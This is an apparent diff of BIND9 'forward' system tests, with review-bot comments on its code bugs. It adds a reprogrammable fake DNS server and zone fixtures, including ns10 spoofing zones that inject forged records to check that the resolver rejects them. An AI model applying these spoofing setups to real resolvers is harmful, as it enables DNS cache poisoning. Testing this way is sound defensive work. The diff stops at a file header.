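Review bot: The receive loop in ans11/ans.py calls `create_response(msg[0])` with no error handling, and `create_response` indexes `m.question[0]` right after `dns.message.from_wire(msg)`, so one malformed or question-less datagram raises and ends the responder for the rest of the test run. Wrapping the call in the loop, e.g. `try: rsp = create_response(msg[0])` / `except Exception: rsp = None`, lets the existing `NO RESPONSE` branch handle it. Separately, `logquery` passes three arguments to `f.write`, which raises `TypeError` if the function is ever called; it should be `f.write("%s %s\n" % (type, qname))`, or the helper can be dropped since `create_response` already writes `query.log`. In `sigterm`, `running = False` assigns a local and has no effect before `sys.exit(0)`.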
diff --git a/bin/tests/system/forward/ans6/ans.pl b/bin/tests/system/forward/ans6/ans.pl new file mode 100644 index 0000000..6102e4a --- /dev/null +++ b/bin/tests/system/forward/ans6/ans.pl 
@@ -0,0 +1,562 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# This is the name server from hell. It provides canned +# responses based on pattern matching the queries, and +# can be reprogrammed on-the-fly over a TCP connection. +# +# The server listens for queries on port 5300 (or PORT). +# +# The server listens for control connections on port 5301 (or EXTRAPORT1). +# +# A control connection is a TCP stream of lines like +# +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# +# There can be any number of patterns, each associated +# with any number of response RRs. Each pattern is a +# Perl regular expression. If an empty pattern ("//") is +# received, the server will ignore all incoming queries (TCP +# connections will still be accepted, but both UDP queries +# and TCP queries will not be responded to). If a non-empty +# pattern is then received over the same control connection, +# default behavior is restored. +# +# Each incoming query is converted into a string of the form +# "qname qtype" (the printable query domain name, space, +# printable query type) and matched against each pattern. +# +# The first pattern matching the query is selected, and +# the RR following the pattern line are sent in the +# answer section of the response. +# +# Each new control connection causes the current set of +# patterns and responses to be cleared before adding new +# ones. +# +# The server handles UDP and TCP queries. Zone transfer +# responses work, but must fit in a single 64 k message. 
+# +# Now you can add TSIG, just specify key/key data with: +# +# /pattern <key> <key_data>/ +# name ttl type rdata +# name ttl type rdata +# +# Note that this data will still be sent with any request for +# pattern, only this data will be signed. Currently, this is only +# done for TCP. +# +# /pattern bad-id <key> <key_data>/ +# /pattern bad-id/ +# +# will add 50 to the message id of the response. + + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +# We default to listening on 10.53.0.2 for historical reasons +# XXX: we should also be able to specify IPv6 +my $server_addr = "10.53.0.6"; +if (@ARGV > 0) { + $server_addr = @ARGV[0]; +} + +my $mainport = int($ENV{'PORT'}); +if (!$mainport) { $mainport = 5300; } +my $ctrlport = int($ENV{'EXTRAPORT1'}); +if (!$ctrlport) { $ctrlport = 5301; } + +print "listening on $server_addr:$mainport,$ctrlport.\n"; +print "Using Net::DNS $Net::DNS::VERSION\n"; + +# XXX: we should also be able to set the port numbers to listen on. 
+my $ctlsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $ctrlport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "udp", Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +#my @answers = (); +my @rules; +my $udphandler; +my $tcphandler; + +sub handleUDP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + while (my $rr = $request->pop("additional")) { + $prev_tsig = $rr if ($rr->type eq "TSIG"); + } + + my $r; + my $answers = 0; + my $match; + my $key_name; + my $key_data; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + ($match, $key_name, $key_data) = split(/ /,$pattern); + print "[handleUDP] $match, $key_name, $key_data\n"; + $match =~ tr/\// /; + if ("$qname $qtype" =~ /$match/) { + my $a; + foreach $a (@{$r->{answer}}) { + my $resp; + $resp = new Net::DNS::RR("$qname $a"); + $packet->push("answer", $resp); + ++$answers; + } + last; + } + } 
+ if ($answers eq 0) { + my $soa; + $soa = new Net::DNS::RR("$qname 300 IN SOA . . 0 0 0 0 0"); + $packet->push("authority", $soa) + } + if (defined($key_name) && defined($key_data)) { + my $tsig; + # Sign the packet + print " Signing the response with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } else { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $packet->sign_tsig($tsig); + } + #$packet->print; + + return $packet->data; +} + +# namelen: +# given a stream of data, reads a DNS-formatted name and returns its +# total length, thus making it possible to skip past it. +sub namelen { + my ($data) = @_; + my $len = 0; + my $label_len = 0; + do { + $label_len = unpack("c", $data); + $data = substr($data, $label_len + 1); + $len += $label_len + 1; + } while ($label_len != 0); + return ($len); +} + +# packetlen: +# given a stream of data, reads a DNS wire-format packet and returns +# its total length, making it possible to skip past it. 
+sub packetlen { + my ($data) = @_; + my $q; + my $rr; + my $header; + my $offset; + + # + # decode/encode were introduced in Net::DNS 0.68 + # parse is no longer a method and calling it here makes perl croak. + # + my $decode = 0; + $decode = 1 if ($Net::DNS::VERSION >= 0.68); + + if ($decode) { + ($header, $offset) = Net::DNS::Header->decode(\$data); + } else { + ($header, $offset) = Net::DNS::Header->parse(\$data); + } + + for (1 .. $header->qdcount) { + if ($decode) { + ($q, $offset) = + Net::DNS::Question->decode(\$data, $offset); + } else { + ($q, $offset) = + Net::DNS::Question->parse(\$data, $offset); + } + } + for (1 .. $header->ancount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->nscount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->arcount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + return $offset; +} + +# sign_tcp_continuation: +# This is a hack to correct the problem that Net::DNS has no idea how +# to sign multiple-message TCP responses. Several data that are included +# in the digest when signing a query or the first message of a response are +# omitted when signing subsequent messages in a TCP stream. +# +# Net::DNS::Packet->sign_tsig() has the ability to use a custom signing +# function (specified by calling Packet->sign_func()). We use this +# function as the signing function for TCP continuations, and it removes +# the unwanted data from the digest before calling the default sign_hmac +# function. 
+sub sign_tcp_continuation { + my ($key, $data) = @_; + + # copy out first two bytes: size of the previous MAC + my $rmacsize = unpack("n", $data); + $data = substr($data, 2); + + # copy out previous MAC + my $rmac = substr($data, 0, $rmacsize); + $data = substr($data, $rmacsize); + + # try parsing out the packet information + my $plen = packetlen($data); + my $pdata = substr($data, 0, $plen); + $data = substr($data, $plen); + + # remove the keyname, ttl, class, and algorithm name + $data = substr($data, namelen($data)); + $data = substr($data, 6); + $data = substr($data, namelen($data)); + + # preserve the TSIG data + my $tdata = substr($data, 0, 8); + + # prepare a new digest and sign with it + $data = pack("n", $rmacsize) . $rmac . $pdata . $tdata; + return Net::DNS::RR::TSIG::sign_hmac($key, $data); +} + +sub handleTCP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $opaque; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + my $signer; + my $continuation = 0; + if ($Net::DNS::VERSION < 0.81) { + while (my $rr = $request->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + } + + my @results = (); + my $count_these = 0; + + my $r; + my $answers = 0; + my $match; + my $key_name; + my $key_data; + my $tname; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($match, $key_name, $key_data, $tname) = split(/ /,$pattern); + print "[handleTCP] $match, $key_name, $key_data, $tname 
\n"; + $match =~ tr/\// /; + if ("$qname $qtype" =~ /$match/) { + $count_these++; + my $a; + foreach $a (@{$r->{answer}}) { + my $resp; + $resp = new Net::DNS::RR("$qname $a"); + $packet->push("answer", $resp); + ++$answers; + } + last; + } + } + if ($answers eq 0) { + my $soa; + $soa = new Net::DNS::RR("$qname 300 SOA . . 0 0 0 0 0"); + $packet->push("authority", $soa) + } + if (defined($key_name) && $key_name eq "bad-id") { + $packet->header->id(($id+50)%0xffff); + $key_name = $key_data; + ($key_data, $tname) = split(/ /,$tname) + } + if (defined($key_name) && defined($key_data)) { + my $tsig; + # sign the packet + print " Signing the data with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } elsif ($Net::DNS::VERSION >= 0.81 && + $continuation) { + } elsif ($Net::DNS::VERSION >= 0.75 && + $continuation) { + $tsig = $prev_tsig; + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. 
+ $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } elsif ($Net::DNS::VERSION < 0.81) { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $tsig->sign_func($signer) if defined($signer); + $tsig->continuation($continuation) if + ($Net::DNS::VERSION >= 0.71 && + $Net::DNS::VERSION <= 0.74 ); + if ($Net::DNS::VERSION < 0.81) { + $packet->sign_tsig($tsig); + } elsif ($continuation) { + $opaque = $packet->sign_tsig($opaque); + } else { + $opaque = $packet->sign_tsig($request); + } + $signer = \&sign_tcp_continuation + if ($Net::DNS::VERSION < 0.70); + $continuation = 1; + + my $copy = + Net::DNS::Packet->new(\($packet->data)); + $prev_tsig = $copy->pop("additional"); + } + + #$packet->print; + push(@results,$packet->data); + if ($tname eq "") { + $tname = $qname; + } + $packet = new Net::DNS::Packet($tname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + print " A total of $count_these patterns matched\n"; + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($ctlsock), 1) = 1; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($ctlsock), 1)) { + warn "ctl conn"; + my $conn = $ctlsock->accept; + my $rule = (); + @rules = (); + while (my $line = $conn->getline) { + chomp $line; + if ($line =~ m!^/(.*)/$!) 
{ + if (length($1) == 0) { + $udphandler = sub { return; }; + $tcphandler = sub { return; }; + } else { + $udphandler = \&handleUDP; + $tcphandler = \&handleTCP; + $rule = { pattern => $1, answer => [] }; + push(@rules, $rule); + } + } else { + push(@{$rule->{answer}}, $line); + } + } + $conn->close; + #print Dumper(@rules); + #print "+=+=+ $rules[0]->{'pattern'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]->{'rname'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]\n"; + } elsif (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + my $result = &$udphandler($buf); + if (defined($result)) { + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = &$tcphandler($buf); + if (defined($result)) { + foreach my $response (@$result) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); + print " Sent: $n chars via TCP\n"; + } + } + } + $conn->close; + } +} diff --git a/bin/tests/system/forward/clean.sh b/bin/tests/system/forward/clean.sh new file mode 100644 index 0000000..fad8ec5 --- /dev/null +++ b/bin/tests/system/forward/clean.sh 
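Review bot: In `handleTCP` of ans6/ans.pl the rule loop declares `my($match, $key_name, $key_data, $tname) = split(/ /,$pattern);`, which shadows the variables of the same names declared just before the loop. After the loop, the `bad-id` branch and the `defined($key_name) && defined($key_data)` signing block read the outer, never-assigned variables, so as far as this hunk shows TCP responses are never TSIG-signed and `bad-id` never takes effect, contrary to the header comment. `handleUDP` assigns without `my`; doing the same here, `($match, $key_name, $key_data, $tname) = split(/ /, $pattern);`, restores the intended behaviour. The comment "We default to listening on 10.53.0.2" also disagrees with the `10.53.0.6` default below it, and `@ARGV[0]` should be `$ARGV[0]`.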
@@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after forward tests. +# +rm -f ./ans11/query.log +rm -f ./dig.out.* +rm -f ./*/named.conf +rm -f ./*/named.memstats +rm -f ./*/named.run ./*/named.run.prev +rm -f ./*/named_dump.db +rm -f ./ns*/named.lock +rm -f ./ns*/managed-keys.bind* +rm -f ./ns1/root.db ./ns1/root.db.signed +rm -f ./ns*/trusted.conf +rm -f ./ns1/K* ./ns1/dsset-* diff --git a/bin/tests/system/forward/ns1/diditwork.net.db b/bin/tests/system/forward/ns1/diditwork.net.db new file mode 100644 index 0000000..fd9a46e --- /dev/null +++ b/bin/tests/system/forward/ns1/diditwork.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns + TXT "recursed" +ns A 10.53.0.1 diff --git a/bin/tests/system/forward/ns1/example.db b/bin/tests/system/forward/ns1/example.db new file mode 100644 index 0000000..aac1bef --- /dev/null +++ b/bin/tests/system/forward/ns1/example.db 
@@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +txt TXT "recursed" diff --git a/bin/tests/system/forward/ns1/named.conf.in b/bin/tests/system/forward/ns1/named.conf.in new file mode 100644 index 0000000..f871fd6 --- /dev/null +++ b/bin/tests/system/forward/ns1/named.conf.in 
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ query-source-v6 address fd92:7065:b8e:ffff::1;
+ notify-source 10.53.0.1;
+ notify-source-v6 fd92:7065:b8e:ffff::1;
+ transfer-source 10.53.0.1;
+ transfer-source-v6 fd92:7065:b8e:ffff::1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { fd92:7065:b8e:ffff::1; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+zone "example1." {
+ type primary;
+ file "example.db";
+};
+
+zone "example2." {
+ type primary;
+ file "example.db";
+};
+
+zone "example3." {
+ type primary;
+ file "example.db";
+};
+
+zone "example4." {
+ type primary;
+ file "example.db";
+};
+
+zone "example5." {
+ type primary;
+ file "example.db";
+};
+
+zone "sld.tld" {
+ type primary;
+ file "sld.tld.db";
+};
+
+/* A forward zone without forwarders. */
+zone "example6" {
+ type forward;
+};
+
+zone "diditwork.net" {
+ type primary;
+ file "diditwork.net.db";
+};
+
+zone "spoofed.net" {
+ type primary;
+ file "spoofed.net.db";
+};
+
+zone "sub.local.net" {
+ type primary;
+ file "sub.local.net.db";
+};
+
+zone "net.example.lll" {
+ type master;
+ file "net.example.lll";
+};
diff --git a/bin/tests/system/forward/ns1/net.example.lll b/bin/tests/system/forward/ns1/net.example.lll
new file mode 100644
index 0000000..ba0804f
--- /dev/null
+++ b/bin/tests/system/forward/ns1/net.example.lll
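Review bot: The last zone in ns1/named.conf.in, `net.example.lll`, is declared with `type master;` while every other authoritative zone in the same file uses `type primary;`. The two spellings are synonyms, but mixing them in one fixture makes the file harder to search and review; I would write `type primary;` here as well. The ns10/named.conf.in added later in this commit uses `type master;` for all of its zones, so the same pass could bring it in line.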
@@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +net.example.lll. SOA . . 0 0 0 0 0 +net.example.lll. NS attackSecureDomain.net. +didItWork.net.example.lll. TXT "if you can see this record the attack worked" diff --git a/bin/tests/system/forward/ns1/root.db.in b/bin/tests/system/forward/ns1/root.db.in new file mode 100644 index 0000000..95ffac3 --- /dev/null +++ b/bin/tests/system/forward/ns1/root.db.in @@ -0,0 +1,36 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 + +example7 NS ns.example7 +ns.example7 A 10.53.0.2 + +tld NS ns.tld +ns.tld A 10.53.0.2 diff --git a/bin/tests/system/forward/ns1/sign.sh b/bin/tests/system/forward/ns1/sign.sh new file mode 100644 index 0000000..cba1918 --- /dev/null +++ b/bin/tests/system/forward/ns1/sign.sh 
@@ -0,0 +1,34 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+echo_i "ns1/sign.sh"
+
+ksk=$("$KEYGEN" -q -fk -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$ksk.key" "$zsk.key" > "$zonefile"
+
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+
+# Configure the resolving server with a static key.
+keyfile_to_static_ds "$ksk" > trusted.conf
+cp trusted.conf ../ns3/trusted.conf
diff --git a/bin/tests/system/forward/ns1/sld.tld.db b/bin/tests/system/forward/ns1/sld.tld.db
new file mode 100644
index 0000000..f0d4b05
--- /dev/null
+++ b/bin/tests/system/forward/ns1/sld.tld.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns root (
+ 2000082401 ; serial
+ 1800 ; refresh (30 minutes)
+ 1800 ; retry (30 minutes)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+xxx TXT "foo"
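Review bot: In ns1/sign.sh the `"$SIGNER"` call sends both stdout and stderr to `/dev/null`, so when signing fails the script stops under `set -e` without showing why. Keeping the output in a file makes a failed setup diagnosable, for example `"$SIGNER" -P -g -o "$zone" "$zonefile" > signer.out 2>&1` (the file name is only a suggestion), with a matching `rm -f ./ns1/signer.out` in clean.sh. The `-P` flag also turns off the signer's post-sign verification; since `trusted.conf` for ns3 is derived from this key, a one-line comment saying why verification is skipped would help the next reader.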
diff --git a/bin/tests/system/forward/ns1/spoofed.net.db b/bin/tests/system/forward/ns1/spoofed.net.db new file mode 100644 index 0000000..eedc46f --- /dev/null +++ b/bin/tests/system/forward/ns1/spoofed.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 +sub TXT "recursed" diff --git a/bin/tests/system/forward/ns1/sub.local.net.db b/bin/tests/system/forward/ns1/sub.local.net.db new file mode 100644 index 0000000..fd9a46e --- /dev/null +++ b/bin/tests/system/forward/ns1/sub.local.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns + TXT "recursed" +ns A 10.53.0.1 diff --git a/bin/tests/system/forward/ns10/fakenet.zone b/bin/tests/system/forward/ns10/fakenet.zone new file mode 100644 index 0000000..b655a32 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakenet.zone 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +net. SOA . . 0 0 0 0 0 +net. NS attackSecureDomain.net. +attackSecureDomain.net. A 10.53.0.10 +didItWork.net. TXT "if you can see this record the attack worked" +ns.spoofed.net. A 10.53.0.10 diff --git a/bin/tests/system/forward/ns10/fakenet2.zone b/bin/tests/system/forward/ns10/fakenet2.zone new file mode 100644 index 0000000..cd1e6e9 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakenet2.zone @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +net2. SOA . . 0 0 0 0 0 +net2. NS attackSecureDomain.net. +net2. DNAME net.example.lll. diff --git a/bin/tests/system/forward/ns10/fakesublocalnet.zone b/bin/tests/system/forward/ns10/fakesublocalnet.zone new file mode 100644 index 0000000..160b533 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakesublocalnet.zone 
@@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +sub.local.net. SOA . . 0 0 0 0 0 +sub.local.net. NS ns.spoofed.net. +sub.local.net. TXT "if you see this attacker overrode local delegation" diff --git a/bin/tests/system/forward/ns10/fakesublocaltld.zone b/bin/tests/system/forward/ns10/fakesublocaltld.zone new file mode 100644 index 0000000..f78cbc7 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakesublocaltld.zone @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +sub.local.tld. 3600 IN SOA . . 0 0 0 0 0 +sub.local.tld. 3600 IN NS ns.sub.local.tld. +sub.local.tld. 3600 IN TXT bad +ns.sub.local.tld. 3600 IN A 10.53.0.8 diff --git a/bin/tests/system/forward/ns10/named.conf.in b/bin/tests/system/forward/ns10/named.conf.in new file mode 100644 index 0000000..1f318dd --- /dev/null +++ 